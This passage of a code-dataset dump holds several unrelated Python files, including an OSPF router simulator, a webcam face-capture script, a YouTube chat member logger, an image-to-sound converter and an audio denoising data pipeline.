s<n:\r\n if premier(i):\r\n s+=1\r\n i+=1\r\n else:\r\n i+=1\r\n return i-1 \r\n\r\n\r\nassert(exo7(6)==13)\r\nprint(exo7(10001))\r\n\r\n\r\n\r\n","sub_path":"exo7.py","file_name":"exo7.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"329089410","text":"#! 
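One caveat on the channel example above: gevent's documentation recommends running monkey.patch_all() before any other imports, so that modules bound by earlier import statements see the patched stdlib; calling it after the imports, as the example does, can leave already-imported modules on the unpatched versions. The conventional ordering:

```python
# first lines of the entry script, before anything else is imported
from gevent import monkey
monkey.patch_all()

import time    # now resolves to the cooperative, gevent-aware version
import socket  # likewise patched
```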
/usr/bin/env python3\n\nfrom mysql.connector import errors, errorcode\nfrom functools import partialmethod\nfrom io import StringIO\n\nclass ModelBase(object):\n def __init__(self, sub_name:str, **row_dict : dict):\n if self.check_row_schema(row_dict):\n for k,v in row_dict.items():\n self._row_dict = row_dict\n if k not in self.get_readonly_attr_names():\n setattr(\n self, k, \n property(\n partialmethod(self.__get_data, key=k),\n partialmethod(self.__set_data, key=k)\n )\n )\n else:\n setattr(\n self, k, \n property(partialmethod(self.__get_data, key=k))\n )\n else:\n raise errors.DataError(\"{} Schema is incorrect!\".format(sub_name))\n\n @staticmethod\n def check_row_schema(**row_dict : dict) -> bool:\n raise NotImplementedError\n\n @staticmethod\n def get_readonly_attr_names() -> tuple:\n raise NotImplementedError\n\n def __get_data(self, key:str='', default:any=None) -> any:\n return self._row_dict[key] if key in self._row_dict else default\n\n def __set_data(self, key:str='', val:any=None):\n if key in self._row_dict:\n self._row_dict[key] = val\n\n def toDict(self):\n return self._row_dict\n\n def toTuple(self):\n return tuple(self._row_dict.values())\n\n # def getQueryStr(self):\n # res = StringIO('')\n # for k in self._row_dict.keys():\n # res.write(\"%({})s,\".format(k))\n # return res.getvalue()\n","sub_path":"weight/weight_be/weights/db/models/modelBase.py","file_name":"modelBase.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"643762321","text":"#https://codeforces.com/problemset/problem/492/B\n\nn,l = input().split(' ')\n\nlocations= list(map(int,list(input().split(' '))))\nlocations.sort()\n\nmax_range=0\ntoCompare=locations[0]\n\nfor i in locations[1:]:\n if(i-toCompare>max_range):\n max_range= i-toCompare\n toCompare=i\n\nmax1=max_range/2\nmax2=locations[0]\nmax3=int(l)-locations[-1]\nif(max1>max2 and max1>max3):\n print(max1)\nelif(max2>max3):\n print(max2)\nelse:\n print(max3)\n\n","sub_path":"CodeForces/B. Vanya and Lanterns.py","file_name":"B. 
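A note on modelBase.py above: the property objects built in ModelBase.__init__ are assigned to the instance, where the descriptor protocol never fires, so they sit as inert values rather than acting as getters and setters. A minimal working alternative for the same requirement (dict-backed fields, some read-only), sketched with __getattr__/__setattr__; the class and field names are hypothetical:

```python
class RowProxy:
    _readonly = ('id',)  # example read-only field

    def __init__(self, **row):
        object.__setattr__(self, '_row', dict(row))

    def __getattr__(self, key):
        # called only when normal attribute lookup fails
        try:
            return self._row[key]
        except KeyError:
            raise AttributeError(key)

    def __setattr__(self, key, value):
        if key in self._readonly:
            raise AttributeError(f'{key} is read-only')
        self._row[key] = value

r = RowProxy(id=1, weight=72.5)
r.weight = 73.0
assert r.weight == 73.0
```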
Vanya and Lanterns.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"20823301","text":"import cv2\r\nfrom PIL import Image\r\ncam = cv2.VideoCapture(0)\r\ndetector=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\nId=int(input('enter your id: '))\r\n \r\nsampleNum=0\r\nwhile(True):\r\n    ret, img = cam.read()\r\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n    faces = detector.detectMultiScale(gray, 1.3, 5)\r\n    for (x,y,w,h) in faces:\r\n        cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,255),2)\r\n        \r\n        #incrementing sample number \r\n        sampleNum=sampleNum+1\r\n        #saving the captured face in the dataset folder\r\n        cv2.imwrite(\"[Put location to store images here]\"+str(Id) +'.'+ str(sampleNum) + \".jpg\", gray[y:y+h,x:x+w])\r\n\r\n    cv2.imshow('frame',img)\r\n    #wait for 100 milliseconds \r\n    cv2.waitKey(100)\r\n    if sampleNum>40:\r\n        break\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"facecam.py","file_name":"facecam.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"389248380","text":"import pytchat\n\nlist_dic = \"F:/(member_lists)/\"\noutf = open(list_dic + \"gura_members2.csv\",\"w\", encoding=\"utf-8\")\n\nvideo_id = 'hD6LwW7Zkf8'\nchat = pytchat.create(video_id=video_id)\n\nmember_list = {}\ntry:\n    while chat.is_alive():\n        for c in chat.get().items:\n            if c.author.badgeUrl:\n                member_list[c.author.name] = c.author.channelUrl\n        print(len(member_list))\nexcept:\n    # interrupted (e.g. Ctrl-C): fall through to the finally block,\n    # which writes the CSV exactly once instead of duplicating it here\n    pass\nfinally:\n    print(\"name,channel\", file=outf)\n    for k in member_list:\n        print(k, member_list[k], sep=\",\",file=outf)\n    outf.close()","sub_path":"chat_capture/chat_capture.py","file_name":"chat_capture.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"68467401","text":"import argparse\nimport socket\nfrom random import randint\nfrom numpy import zeros\nfrom sys import maxsize\nimport threading\nfrom datetime import datetime\nimport os\nfrom graphviz import Graph\n\nlocal_IP = \"127.0.0.1\"\nport_Prefix = 10000\nBUFFER_SIZE = 1024\n\n\ndef setInterval(interval):\n    def decorator(function):\n        def wrapper(*args, **kwargs):\n            stopped = threading.Event()\n\n            def loop(): # executed in another thread\n                while not stopped.wait(interval): # until stopped\n                    function(*args, **kwargs)\n\n            t = threading.Thread(target=loop)\n            t.daemon = True # stop if the program exits\n            t.start()\n            return stopped\n        return wrapper\n    return decorator\n\n\nclass Router:\n    def __init__(self, id, infile, outfile, hello, lsa, spf, log_level):\n        self.id = id\n        self.infile = infile\n        self.outfile = outfile\n        self.hello = hello\n        self.lsa = lsa\n        self.spf = spf\n        self.log_level = log_level\n        self.neighbours = {}\n        self.seq_nums = {}\n        self.seq_no = 0\n        self.lock = threading.Lock()\n        self.parse_infile()\n\n    def parse_infile(self):\n        # Read infile and get lines\n        infile = open(self.infile, \"r\")\n        lines = infile.readlines()\n\n        # Split string and set values\n        t1, t2 = lines[0].split(\",\")\n        self.routers = int(t1)\n        self.edges = int(t2)\n        with self.lock:\n            self.graph = zeros((self.routers, self.routers))\n\n        # Read lines and set neighbours\n        for idx in range(1, self.edges+1):\n            i, j, mini, maxi = lines[idx].split(\",\")\n            if(int(i) == self.id):\n
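Usage of the setInterval decorator defined in ospf.py, assuming the decorator above is in scope: the decorated call starts a daemon thread that reruns the function every interval seconds and returns the threading.Event that stops it.

```python
@setInterval(1.0)
def tick():
    print('tick')

stopper = tick()   # starts the periodic thread, returns the stop Event
# ... later ...
stopper.set()      # ends the loop on its next wait
```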
self.neighbours[int(j)] = (int(mini), int(maxi))\n elif(int(j) == self.id):\n self.neighbours[int(i)] = (int(mini), int(maxi))\n else:\n pass\n\n def send_msg(self, id, msg):\n UDPClientSocket = socket.socket(\n family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.sendto(str.encode(\n f\"{self.id},\"+msg), (local_IP, id+port_Prefix))\n self.debug(1, f\"Message sent on {id} : {msg}\")\n\n def receive_msg(self):\n \"\"\"\n Starts the UDP server at port (port_Prefix + id) and waits to receive packets.\n \"\"\"\n # Start the udp server\n UDPServerSocket = socket.socket(\n family=socket.AF_INET, type=socket.SOCK_DGRAM)\n # Bind the server with port (port_Prefix + id)\n UDPServerSocket.bind((local_IP, port_Prefix + self.id))\n self.debug(2, f\"UDP server started on {port_Prefix+self.id}\")\n\n # Wait for receiving packets\n while True:\n bytesAddressPair = UDPServerSocket.recvfrom(BUFFER_SIZE)\n message = str(bytesAddressPair[0], \"utf-8\")\n first_comma = message.find(',')\n rcv_id = int(message[:first_comma])\n self.debug(1, f\"Received message from {rcv_id} : {message}\")\n message = message[first_comma+1:]\n\n # Check the message and process accordingly\n if(message[:message.find(',')] == \"HELLO\"):\n self.send_hello_reply(message, rcv_id)\n elif(message.startswith(\"HELLOREPLY\")):\n self.accept_hello_reply(message, rcv_id)\n elif(message.startswith(\"LSA\")):\n self.receive_lsa(message, rcv_id)\n else:\n raise ValueError(\n f\"Incorrect msg received : {message} from {rcv_id}\")\n\n def send_hello(self):\n for id in self.neighbours:\n self.send_msg(id, f\"HELLO,{self.id}\")\n\n def send_hello_reply(self, msg, rcv_router_id):\n rcv_id = int(msg.split(',')[1])\n if(rcv_id != rcv_router_id):\n raise KeyError(\n f\"Receiver id {rcv_router_id} != id in msg {rcv_id}\")\n new_cost = randint(\n self.neighbours[rcv_id][0], self.neighbours[rcv_id][1])\n self.send_msg(rcv_id, f\"HELLOREPLY,{self.id},{rcv_id},{new_cost}\")\n with self.lock:\n self.graph[self.id, rcv_id] = new_cost\n self.debug(2, f\"HELLO ACK to {rcv_id} with cost {new_cost}\")\n\n def accept_hello_reply(self, msg, rcv_router_id):\n tokens = msg.split(',')\n j, i, linkij = int(tokens[1]), int(tokens[2]), int(tokens[3])\n if(j != rcv_router_id):\n raise KeyError(f\"Receiver id {rcv_router_id} != id in msg {j}\")\n if(i != self.id):\n raise KeyError(\n f\"Incorrect message received. 
Directed to {i} received by {self.id}\")\n with self.lock:\n self.graph[i][j] = int(linkij)\n self.debug(2, f\"HELLO ACK received from {j} with cost {linkij}\")\n\n def send_lsa(self):\n self.seq_no += 1\n msg = f\"LSA,{self.id},{self.seq_no},\"\n neighs = 0\n lsa_suffix = \"\"\n for r in range(self.routers):\n with self.lock:\n if(self.graph[self.id][r] != maxsize):\n lsa_suffix += f\",{r},{int(self.graph[self.id][r])}\"\n neighs += 1\n\n msg += f\"{neighs}{lsa_suffix}\"\n\n for n in range(self.routers):\n self.send_msg(n, msg)\n self.debug(2, f\"LSA sent to {n}\")\n\n def receive_lsa(self, msg, rcv_router_id):\n tokens = msg.split(',')\n srcid = int(tokens[1])\n seq_num = int(tokens[2])\n entries = int(tokens[3])\n self.debug(2, f\"LSA received from {srcid}\")\n\n if srcid not in self.seq_nums.keys():\n self.seq_nums[srcid] = 0\n if(seq_num <= self.seq_nums[srcid]):\n return\n\n self.seq_nums[srcid] = seq_num\n for i in range(entries):\n neigh = int(tokens[4+2*i])\n cost = int(tokens[5+2*i])\n with self.lock:\n self.graph[srcid][neigh] = cost\n\n # Forward this message to all the neighbours except the rcv_router\n for n in self.neighbours:\n if(n != rcv_router_id):\n self.send_msg(n, msg)\n self.debug(2, f\"LSA forwarded to {n}\")\n\n def debug(self, status, msg):\n if(status <= self.log_level):\n if(status >= 2):\n print(\n f\"[\\033[0;32mDEBUG\\033[0m Router-{self.id} {datetime.now().strftime('%H:%M:%S')}] : {msg}\")\n elif(status == 1):\n print(\n f\"[\\033[0;33mINFO\\033[0m Router-{self.id} {datetime.now().strftime('%H:%M:%S')}] : {msg}\")\n else:\n print(\n f\"[\\033[0;34mMSG\\033[0m Router-{self.id} {datetime.now().strftime('%H:%M:%S')}] : {msg}\")\n\n def minDistance(self, dist, sptSet):\n\n # Initilaize minimum distance for next node\n mini = maxsize\n min_index = -1\n # Search not nearest vertex not in the\n # shortest path tree\n for v in range(self.routers):\n if dist[v] < mini and sptSet[v] == False:\n mini = dist[v]\n min_index = v\n\n return min_index\n\n def getPath(self, j):\n if self.parent[j] == -1:\n return str(j)\n return self.getPath(self.parent[j]) + \"->\" + str(j)\n\n def dijkstra(self):\n dist = [maxsize] * self.routers\n dist[self.id] = 0\n sptSet = [False] * self.routers\n self.parent = [-1] * self.routers\n\n for _ in range(self.routers):\n u = self.minDistance(dist, sptSet)\n sptSet[u] = True\n for v in range(self.routers):\n with self.lock:\n if ((self.graph[u][v] > 0) and\n (sptSet[v] == False) and\n (dist[v] > dist[u] + self.graph[u][v])):\n dist[v] = dist[u] + self.graph[u][v]\n self.parent[v] = u\n\n self.dist = dist\n\n def plotGraph(self):\n def get_name(a, b): return f\"start_{b}\" if (a == b) else f\"router_{a}\"\n\n g = Graph(self.outfile.replace(\".txt\", \"\"), filename=self.outfile.replace(\".txt\", \".gv\"),\n engine='sfdp', strict=True)\n g.attr('node', style='filled', color=\"lightblue\")\n\n with g.subgraph(name='shortest_path') as c:\n for i in range(self.routers):\n if(self.parent[i] != -1):\n c.edge(get_name(self.parent[i], self.id), get_name(\n i, self.id), label=f\"{int(self.graph[self.parent[i]][i])}\", color=\"green\")\n\n for i in range(self.routers):\n for j in range(i+1, self.routers):\n if self.graph[i][j] != 0:\n g.edge(get_name(i, self.id), get_name(\n j, self.id), label=f\"{int(self.graph[i][j])}\")\n\n g.render(filename=self.outfile.replace(\".txt\", \"\"), format=\"png\")\n\n def write_outfile(self):\n outfile = open(self.outfile, \"a\")\n outfile.write(f\"{self.id},{datetime.now().strftime('%H:%M:%S')}\\n\")\n for r in 
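dijkstra() records each vertex's predecessor in self.parent, and getPath() rebuilds the route by walking predecessors back to the source (marked by -1). The bookkeeping in isolation, on a three-node example where 0->1->2 (cost 3) beats a direct 0->2 edge (cost 4):

```python
def get_path(parent, j):
    if parent[j] == -1:
        return str(j)
    return get_path(parent, parent[j]) + '->' + str(j)

parent = [-1, 0, 1]  # what Dijkstra from source 0 would leave behind
assert get_path(parent, 2) == '0->1->2'
```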
range(self.routers):\n if(r != self.id):\n outfile.write(f\"{r},{self.getPath(r)},{int(self.dist[r])}\\n\")\n self.debug(2, f\"Outfile updated by {self.id}\")\n\n def spf_thread_fn(self):\n self.dijkstra()\n self.debug(1, \"Shortest paths updated.\")\n self.write_outfile()\n self.debug(3, self.graph)\n self.plotGraph()\n\n def start_router(self):\n self.debug(2, \"Router started\")\n t1 = threading.Thread(target=self.receive_msg)\n t1.start()\n self.debug(2, \"Server started\")\n\n @setInterval(self.hello)\n def fun1(): self.send_hello()\n\n @setInterval(self.lsa)\n def fun2(): self.send_lsa()\n\n @setInterval(self.spf)\n def fun3(): self.spf_thread_fn()\n\n t2 = fun1()\n self.debug(2, \"Hello thread started\")\n\n t3 = fun2()\n self.debug(2, \"LSA thread started\")\n\n t4 = fun3()\n self.debug(2, \"SPF thread started\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Program to simulate a router using OSPF routing algorithm.\")\n parser.add_argument('-i', '--id', type=int,\n help=\"id of the router\", required=True)\n parser.add_argument('-o', '--outfile', type=str,\n help=\"outfile for the graph\")\n parser.add_argument('-f', '--infile', type=str,\n help=\"infile for the graph. default = infile.txt\", default=\"infile.txt\")\n parser.add_argument('-H', '--hello_interval', type=int,\n help=\"HELLO interval for OSPF. default = 3\", default=3)\n parser.add_argument('-a', '--lsa_interval', type=int,\n help=\"LSA interval for OSPF. default = 4\", default=4)\n parser.add_argument('-s', '--spf_interval', type=int,\n help=\"SPF interval for OSPF. default = 10\", default=10)\n parser.add_argument('-l', '--log_level', type=int,\n help=\"Logging level for debugging messages. default = 1\", default=1)\n\n args = parser.parse_args()\n if(args.outfile == None):\n os.makedirs(\"outputs\", exist_ok=True)\n args.outfile = f\"outputs/outfile-{args.id}.txt\"\n\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n r = Router(args.id, args.infile, args.outfile,\n args.hello_interval, args.lsa_interval, args.spf_interval, args.log_level)\n r.start_router()\n","sub_path":"Assignment3/ospf.py","file_name":"ospf.py","file_ext":"py","file_size_in_byte":11427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"592092935","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport pyaudio\nimport wave\n\ndef mostrarImagenInicialEstandard(nombre, x,y):\n imagen = cv2.imread(nombre)\n imagenStandard = cv2.resize(imagen, (x,y))\n cv2.imshow(\"Imagen a Convertir\",imagenStandard) \n return imagenStandard\n\ndef obtenerMatricesBGR(imagenStandard, x,y):\n b = np.zeros((y,x))\n g = np.zeros((y,x))\n r = np.zeros((y,x))\n\n for n in list(range(y)):\n for m in list(range(x)):\n b[n][m] = ((imagenStandard[n][m])[0]) \n g[n][m] = ((imagenStandard[n][m])[1]) \n r[n][m] = ((imagenStandard[n][m])[2]) \n\n cv2.imwrite(\"recursosImg/rgb/blue.jpg\", b)\n cv2.imwrite(\"recursosImg/rgb/green.jpg\", g)\n cv2.imwrite(\"recursosImg/rgb/red.jpg\", r)\n\n bgr = [b,g,r]\n return bgr\n\ndef obtenerPixelLbp(color, n, m):\n exponente = 0\n exponentes = [6,7,0,1,2,3,4,5]\n pixelLpbB = 0\n pixelLpbG = 0\n pixelLpbR = 0\n valorCentral0 = (color[0])[n][m]\n valorCentral1 = (color[1])[n][m]\n valorCentral2 = (color[2])[n][m]\n\n for k in list(range(n-1,n+2)):\n for j in list(range(m-1,m+2)):\n if k != n and j != m:\n if (color[0])[k][j] <= valorCentral0:\n pixelLpbB = pixelLpbB + pow(2,exponentes[exponente])\n if 
(color[1])[k][j] <= valorCentral1:\n pixelLpbG = pixelLpbG + pow(2,exponentes[exponente])\n if (color[2])[k][j] <= valorCentral2:\n pixelLpbR = pixelLpbR + pow(2,exponentes[exponente])\n exponente = exponente+1\n\n return [pixelLpbB,pixelLpbB,pixelLpbR] \n\ndef obtenerColor(imagenStandard, n , m):\n color =[ 0,0,0]\n for k in list(range(n-1,n+2)):\n for j in list(range(m-1,m+2)):\n color[0] = color[0]+(imagenStandard[n][m])[0] \n color[1] = color[1]+(imagenStandard[n][m])[1] \n color[2] = color[2]+(imagenStandard[n][m])[2]\n\n color = [int(color[0]/9),int(color[1]/9),int(color[2]/9)]\n\n return color\n\ndef obtenerValoresConversion(imagenStandard,bgr,x,y, compresionNumber):\n cn = 0\n matOrigen= bgr\n valoresConversion=[]\n\n while cn <= compresionNumber:\n puntosX = int((x-1)/3)\n puntosY = int((y-1)/3)\n\n lbpB = np.zeros((puntosY ,puntosX))\n lbpG = np.zeros((puntosY ,puntosX))\n lbpR = np.zeros((puntosY ,puntosX))\n #colores = np.ndarray((puntosY ,puntosX))\n colores = x = [[ [0,0,0] for i in range(puntosX)] for j in range(puntosY)]\n\n if cn == compresionNumber:\n lbpU = np.zeros((puntosY ,puntosX))\n lbpF = np.zeros((puntosY ,puntosX)) \n canal = np.zeros((puntosY ,puntosX)) \n\n view = np.zeros((puntosY ,puntosX))\n\n sonidoPorPixelI = np.zeros((puntosY ,puntosX))\n sonidoPorPixelF = np.zeros((puntosY ,puntosX))\n sonidoPorPixelM = np.zeros((puntosY ,puntosX))\n\n for n in list(range(1,puntosY +1)):\n for m in list(range(1,puntosX +1)):\n o = 0\n p = 0\n if m != 1:\n o = 3\n if n != 1:\n p = 3\n lbpS = obtenerPixelLbp(matOrigen, n+p, m+o) \n lbpB[n-1][m-1] = lbpS[0]\n lbpG[n-1][m-1] = lbpS[1]\n lbpR[n-1][m-1] = lbpS[2]\n\n colores[n-1][m-1]= obtenerColor(imagenStandard,n+p,m+o)\n \n if cn == compresionNumber:\n d = colores[n-1][m-1]#revisar\n\n lbpU[n-1][m-1] = lbpB[n-1][m-1] +lbpG[n-1][m-1] +lbpR[n-1][m-1] \n lbpF[n-1][m-1] = lbpU[n-1][m-1] + d[0] + d[1]+ d[2]\n view[n-1][m-1] = (lbpF[n-1][m-1]) *0.166\n \n\n sonidoPorPixelI[n-1][m-1] = 40+9*lbpF[n-1][m-1]+lbpF[n-1][m-1]\n sonidoPorPixelF[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +9\n sonidoPorPixelM[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +4\n\n print(\"testo\")\n print(d[0])\n print(d[1])\n print(d[2])\n\n if d[0]> d[1] and d[0] > d[2]:\n canal[n-1][m-1] = 0\n elif d[2] > d[1] and d[2] > d[0]:\n canal[n-1][m-1] = 2\n else:\n canal[n-1][m-1] = 1\n\n print(\"canal\")\n print(canal[n-1][m-1])\n print(canal)\n\n valoresConversion = [lbpB,lbpG,lbpR, lbpU,lbpF, canal, sonidoPorPixelI, sonidoPorPixelF, sonidoPorPixelM, puntosX,puntosY]\n\n matOrigen = [lbpB,lbpG,lbpR]\n x = puntosX\n y = puntosY\n imagenStandard = colores\n cn = cn+1 \n\n print(lbpF)\n print(\"el toro\")\n print(lbpU)\n\n cv2.imwrite(\"recursosImg/lpbs/lbpBC.jpg\", lbpB)\n cv2.imwrite(\"recursosImg/lpbs/lbpGC.jpg\", lbpG)\n cv2.imwrite(\"recursosImg/lpbs/lbpRC.jpg\", lbpR)\n cv2.imwrite(\"recursosImg/lpbs/lbpUC.jpg\", lbpU)\n cv2.imwrite(\"recursosImg/lpbs/lbpFC.jpg\", lbpF)\n cv2.imwrite(\"recursosImg/viewBWC.jpg\", view)\n\n return valoresConversion\n\ndef onda(frecuencia, duracion, rate=44100):\n duracion = int(duracion * rate)\n factor = float(frecuencia) * (math.pi * 2) / rate\n return np.sin(np.arange(duracion) * factor)\n\ndef reproducir(stream, senial):\n partes = []\n partes.append(senial)\n\n parte =np.concatenate(partes) * 0.25\n stream.write(parte.astype(np.float32).tostring())\n\n#if __name__ == '__main__':\n\ndef obtenerSonidoDeImagen(valoresConversion, numSeg):\n sonidoF = []\n print(valoresConversion[9])\n print(valoresConversion[10])\n sonidoPorPixelM = 
valoresConversion[8]\n canal = valoresConversion[5]\n print(canal)\n cv2.waitKey(0)\n\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paFloat32,channels=1, rate=44100, output=1)\n for n in list(range(valoresConversion[10])):\n for m in list(range(valoresConversion[9])): \n print(n)\n print(m)\n print(sonidoPorPixelM[n][m])\n print(canal[n][m])\n\n senial = onda(sonidoPorPixelM[n][m],numSeg/(valoresConversion[9]*valoresConversion[10]))\n senial2 = onda(40,numSeg/(valoresConversion[9]*valoresConversion[10]))\n\n if canal[n][m] == 0 :\n senial_stereo = np.ravel(np.column_stack((senial,senial2)))\n elif canal[n][m] == 1:\n senial_stereo = np.ravel(np.column_stack((senial,senial)))\n else:\n senial_stereo = np.ravel(np.column_stack((senial2,senial)))\n\n reproducir(stream,senial_stereo )\n\n stream.close()\n p.terminate()\n\n return sonidoF\n\ndef inicio(nombreImagen, numSeg, x, y,compresionNumber):\n img = mostrarImagenInicialEstandard(nombreImagen, x,y)\n bgr = obtenerMatricesBGR(img, x,y)\n valoresConversion= obtenerValoresConversion(img,bgr,x,y,compresionNumber)\n\n sonidoDeImagen = obtenerSonidoDeImagen(valoresConversion, numSeg)\n cv2.waitKey(0)\n\n#inicio(\"srcImagenes/carito.jpg\", 60, 200,150, 3)\ninicio(\"srcImagenes/andy.jpg\", 15, 400,300, 2)\n\nprint(\"Graciassss TOTALES!!\")\n","sub_path":"ITSP.py","file_name":"ITSP.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"100561602","text":"# Copyright (c) 2015-2018 by the parties listed in the AUTHORS file.\n# All rights reserved. Use of this source code is governed by\n# a BSD-style license that can be found in the LICENSE file.\n\nimport re\n\nimport numpy as np\n\nfrom ..mpi import MPI\nfrom ..op import Operator\nfrom ..dist import Comm, Data\nfrom .tod import TOD\nfrom .. import rng as rng\n\n\nclass OpMemoryCounter(Operator):\n \"\"\"\n Operator which loops over the TOD objects and computes the total\n amount of memory allocated.\n\n Args:\n silent (bool): Only count and return the memory without\n printing.\n *other_caching_objects: Additional objects that have a cache\n member and user wants to include in the total counts\n (e.q. 
DistPixels objects).\n \"\"\"\n\n def __init__(self, *other_caching_objects, silent=False):\n\n self._silent = silent\n self._objects = []\n\n for obj in other_caching_objects:\n self._objects.append(obj)\n\n super().__init__()\n\n def exec(self, data):\n \"\"\"\n Count the memory\n\n Args:\n data (toast.Data): The distributed data.\n \"\"\"\n # the two-level pytoast communicator\n comm = data.comm\n # the global communicator\n cworld = comm.comm_world\n # the communicator within the group\n cgroup = comm.comm_group\n # the communicator with all processes with\n # the same rank within their group\n crank = comm.comm_rank\n\n tot_task = 0\n\n for obj in self._objects:\n try:\n tot_task += obj.cache.report(silent=True)\n except:\n pass\n try:\n tot_task += obj._cache.report(silent=True)\n except:\n pass\n\n for obs in data.obs:\n tod = obs['tod']\n tot_task += tod.cache.report(silent=True)\n\n tot_group = 0\n if cgroup is not MPI.UNDEFINED:\n tot_group = cgroup.allreduce(tot_task, op=MPI.SUM)\n tot_world = cworld.allreduce(tot_task, op=MPI.SUM)\n\n tot_task_max = cworld.allreduce(tot_task, op=MPI.MAX)\n tot_group_max = cworld.allreduce(tot_group, op=MPI.MAX)\n\n if cworld.rank == 0 and not self._silent:\n print()\n print('Memory usage statistics: ')\n print('- Max memory (task): {:.2f} GB'.format(\n tot_task_max / 2**30))\n print('- Max memory (group): {:.2f} GB'.format(\n tot_group_max / 2**30))\n print('Total memory: {:.2f} GB'.format(tot_world / 2**30))\n print('', flush=True)\n\n return tot_world\n","sub_path":"src/python/tod/memorycounter.py","file_name":"memorycounter.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"475009096","text":"import logging\nimport os\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom scipy.signal import decimate, spectrogram, get_window\nfrom librosa.core import amplitude_to_db\nfrom pydub import AudioSegment, effects\nfrom h5py import File\nfrom src.errors import ResamplingError\nfrom src.DBManager import DBManager\nfrom src.AudioBooksManager import AudioBooksManager\nfrom src.NoiseManager import NoiseManager\n\nlogger = logging.getLogger('DataConverter')\n\n\nclass DataManager:\n def __init__(self):\n self.__INPUT_SAMPLING_RATE = int(11025)\n self.__N_SAMPLES_WINDOW = int(1024)\n self.__N_SAMPLES_OVERLAP = int(0.5*self.__N_SAMPLES_WINDOW)\n self.__WINDOW = 'hann'\n self.__CHROME_DRIVER_PATH = r\"resources/chromedriver\"\n\n self.__db = DBManager()\n self.__audio_manager = AudioBooksManager(self.__db, self.__CHROME_DRIVER_PATH)\n self.__noise_manager = NoiseManager(self.__db)\n\n def main(self, filename='', mode='', download=0, noises=[], limit=0):\n try:\n if download:\n logging.info('Downloading audio books for training model')\n self.__audio_manager.downloadData()\n logging.info('Downloading noise audios for training model')\n self.__noise_manager.downloadData()\n logging.info('Retrieving audio-noise combinations')\n file_combinations = self.__db.modelTrainGetCombination(self.__INPUT_SAMPLING_RATE, noises, limit)\n with File(filename, mode) as f:\n logging.info('Creating group for SPS:%d and FFT:%d' % (self.__INPUT_SAMPLING_RATE,\n self.__N_SAMPLES_WINDOW))\n main_group = f.create_group(np.string_('SPS%dFFT%d' % (self.__INPUT_SAMPLING_RATE,\n self.__N_SAMPLES_WINDOW)))\n main_group.attrs.create(np.string_('SAMPLE_RATE'), np.string_(self.__INPUT_SAMPLING_RATE))\n main_group.attrs.create(np.string_('FFT_SIZE'), 
np.string_(self.__N_SAMPLES_WINDOW))\n for idx, file_combination in enumerate(file_combinations):\n try:\n logging.info('Loading data')\n clean_info = self.__db.audioBookGetById(file_combination[1])\n clean = self.load_audio(clean_info[0][9], normalized=False)\n if idx > 0:\n if file_combination[2] != file_combinations[idx - 1][2]:\n noise_info = self.__db.noiseGetById(file_combination[2])\n noise = self.load_audio(noise_info[0][3], normalized=False)\n else:\n noise_info = self.__db.noiseGetById(file_combination[2])\n noise = self.load_audio(noise_info[0][3], normalized=False)\n\n if clean.duration_seconds > noise.duration_seconds:\n logging.info('Clipping clean audio to fit noise audio duration')\n clean = clean[:noise.duration_seconds]\n\n logging.info('Overlaying noise and clean audios')\n dirty = clean.overlay(noise)\n clean_samples = np.array(clean.get_array_of_samples(), dtype=np.float32)\n clean_sampling_rate = clean.frame_rate\n dirty_samples = np.array(dirty.get_array_of_samples(), dtype=np.float32)\n dirty_sampling_rate = dirty.frame_rate\n logging.info('Processing data')\n dirty_freq, dirty_time, dirty_db, dirty_phase = self.__prepateInput(dirty_samples,\n dirty_sampling_rate)\n clean_freq, clean_time, clean_db, clean_phase = self.__prepateInput(clean_samples,\n clean_sampling_rate)\n logging.info('Storing data')\n self.__store_h5_data(main_group, file_combination, clean_info[0], noise_info[0],\n clean_freq, clean_time, clean_db, clean_phase,\n dirty_freq, dirty_time, dirty_db, dirty_phase)\n except ResamplingError as e:\n logging.warning(str(e), exc_info=True)\n\n except Exception as e:\n logging.error(str(e), exc_info=True)\n raise\n\n def __resample(self, input_signal, input_sampling_rate):\n if input_sampling_rate % self.__INPUT_SAMPLING_RATE:\n raise ResamplingError('Downsampling factor is not integer number\\n'\n '\\tInput sampling rate: %d\\n' % input_sampling_rate +\n '\\tTarget sampling rate: %d\\n' % self.__INPUT_SAMPLING_RATE)\n factor = input_sampling_rate / self.__INPUT_SAMPLING_RATE\n logger.info('Input sampling rate is different from the expected by the model.\\n' +\n '\\rInput sampling rate: ' + str(input_sampling_rate) + '\\n' +\n '\\rModel sampling rate: ' + str(self.__INPUT_SAMPLING_RATE) + '\\n' +\n 'Resampling input signal by factor: ' + str(factor))\n in_signal = decimate(input_signal, int(factor))\n return in_signal\n\n def __prepateInput(self, input_signal, sampling_rate):\n if sampling_rate != self.__INPUT_SAMPLING_RATE:\n input_signal = self.__resample(input_signal, 